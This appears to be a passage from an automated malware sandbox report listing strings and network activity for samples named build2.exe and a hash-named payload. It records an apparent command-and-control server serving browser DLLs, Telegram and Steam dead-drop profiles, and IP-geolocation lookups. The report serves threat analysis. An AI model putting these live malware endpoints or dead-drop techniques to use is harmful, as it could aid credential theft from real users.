                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/freebl3.dllosition:
                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/freebl3.dlltware
                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/g
                Source: build2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/ll
                Source: build2.exe, 00000005.00000002.2903117606.0000000000499000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/mozglue.dll
                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/mozglue.dlldge
                Source: build2.exe, 00000005.00000002.2903117606.0000000000499000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/mozglue.dllosition:
                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/mozglue.dlltware
                Source: build2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/msvcp140.dll
                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/msvcp140.dllge
                Source: build2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/msvcp140.dllsJH8
                Source: build2.exe, 00000005.00000002.2909501585.0000000003628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/nss3.dll
                Source: build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/nss3.dll8
                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/nss3.dllt
                Source: build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/oft
                Source: build2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/softokn3.dll
                Source: build2.exe, 00000005.00000002.2909501585.000000000361F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/softokn3.dllLOCALAPPDATA=C:
                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/softokn3.dllge
                Source: build2.exe, 00000005.00000002.2903117606.0000000000499000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851494817.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851284140.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/sqlite3.dll
                Source: build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851494817.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851284140.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/sqlite3.dll.
                Source: build2.exe, 00000005.00000003.1851563800.0000000003628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1870105733.0000000003628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/sqlite3.dll_
                Source: build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/vcruntime140.dll
                Source: build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/vcruntime140.dllH1
                Source: build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/vcruntime140.dllal
                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/vcruntime140.dllser
                Source: build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/vcruntime140.dllx0
                Source: build2.exe, 00000005.00000002.2903117606.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220Content-Disposition:
                Source: build2.exe, 00000005.00000002.2903117606.0000000000499000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220freebl3.dllosition:
                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220ng
                Source: build2.exe, 00000005.00000002.2903117606.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220nux
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1963754699.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1680457736.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000003.1840539958.0000000000887000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842375819.0000000000889000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000003.1920870702.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921733753.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000003.1920210530.0000000000B89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1680457736.0000000000A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/2
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/27
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921649273.0000000000B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/P
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921649273.0000000000B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/d
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeString found in binary or memory: https://api.2ip.ua/geo.json
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json(
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000003.1840539958.0000000000887000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842375819.0000000000889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json-Agent:
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonLL
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonN
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonX
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsone
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921649273.0000000000B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonl
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000003.1840539958.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842375819.00000000008C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsont
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonv0z
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonx
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000003.1920870702.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921733753.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000003.1920210530.0000000000B89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/i
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316287824.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362476595.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/k
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316287824.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362476595.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/m
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1963754699.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1963754699.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1963754699.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
                Source: 27160079615.ttf.3.dr, 30264859306.ttf.3.drString found in binary or memory: https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1965169628.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
                Source: build2.exe, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199601319247
                Source: build2.exe, 00000004.00000002.1746811834.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199601319247helloWFQY12O5J6Nr.$v
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1885029098.000000000993F000.00000004.00000020.00020000.00000000.sdmp, CFIJEBFC.5.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: CFIJEBFC.5.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016dfb6b41c
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016stry
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1885029098.000000000993F000.00000004.00000020.00020000.00000000.sdmp, CFIJEBFC.5.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: CFIJEBFC.5.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17exe
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17lsass.exe
                Source: build2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/R
                Source: build2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/X
                Source: build2.exe, build2.exe, 00000005.00000003.1757338851.0000000000707000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1761763513.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1757407833.0000000000715000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/bg3goty
                Source: build2.exe, 00000005.00000003.1761763513.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/bg3gotyH
                Source: build2.exe, 00000005.00000003.1761763513.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/bg3gotyQ
                Source: build2.exe, 00000004.00000002.1746811834.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/bg3gotymedvsMozilla/5.0
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2369052197.0000000003610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-99MNqXMr
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2369105544.0000000003634000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360803674.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359472467.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362281614.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360926908.0000000003633000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-99MNqXMrdS
                Source: build2.exe, 00000005.00000003.1757407833.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49745 version: TLS 1.2
